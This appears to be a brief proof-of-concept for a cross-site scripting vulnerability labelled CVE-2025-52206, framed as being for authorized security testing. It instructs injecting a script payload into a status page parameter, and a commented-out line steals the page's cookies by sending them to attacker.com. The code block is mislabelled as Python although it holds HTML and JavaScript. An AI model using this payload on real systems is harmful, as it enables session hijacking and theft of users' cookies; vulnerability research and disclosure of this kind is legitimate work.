The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-52206 -->
<!-- Inject this payload into the system status page parameter -->
<script>
// Demonstrate execution via alert
alert('CVE-2025-52206 XSS Vulnerability');
// Example: Steal document cookie
// new Image().src="http://attacker.com/steal?c="+document.cookie;
</script>